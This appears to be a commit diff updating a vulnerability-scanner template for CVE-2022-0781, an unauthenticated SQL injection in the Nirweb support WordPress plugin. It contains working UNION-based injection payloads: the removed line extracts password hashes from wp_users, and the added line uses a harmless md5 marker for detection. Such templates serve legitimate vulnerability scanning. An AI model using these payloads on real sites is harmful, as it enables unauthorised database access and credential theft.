Update CVE-2022-0781.yaml

cves/2022/CVE-2022-0781.yaml

@@ -8,36 +8,33 @@ info:
     The Nirweb support WordPress plugin before 2.8.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
   reference:
     - https://wpscan.com/vulnerability/1a8f9c7b-a422-4f45-a516-c3c14eb05161
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0781
     - https://wordpress.org/plugins/nirweb-support/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0781
   classification:
     cve-id: CVE-2022-0781
   metadata:
     verified: true
-  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauthenticated
+  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,nirweb-support
+
+variables:
+  num: "999999999"
 
 requests:
   - raw:
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
-        Host: lab.aman.local
-        Content-Length: 120
+        Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        action=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,(SELECT user_pass FROM wp_users),NULL,NULL,NULL,NULL,NULL-- -
+        action=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -
 
     matchers-condition: and
     matchers:
-      - type: regex
-        part: body
-        regex:
-          - '<div class="content">([\$a-zA-Z0-9]+)'
-
       - type: word
         part: body
         words:
-          - '<div class="head_answer">'
+          - '{{md5(num)}}'
 
       - type: status
         status:
-          - 200
+          - 200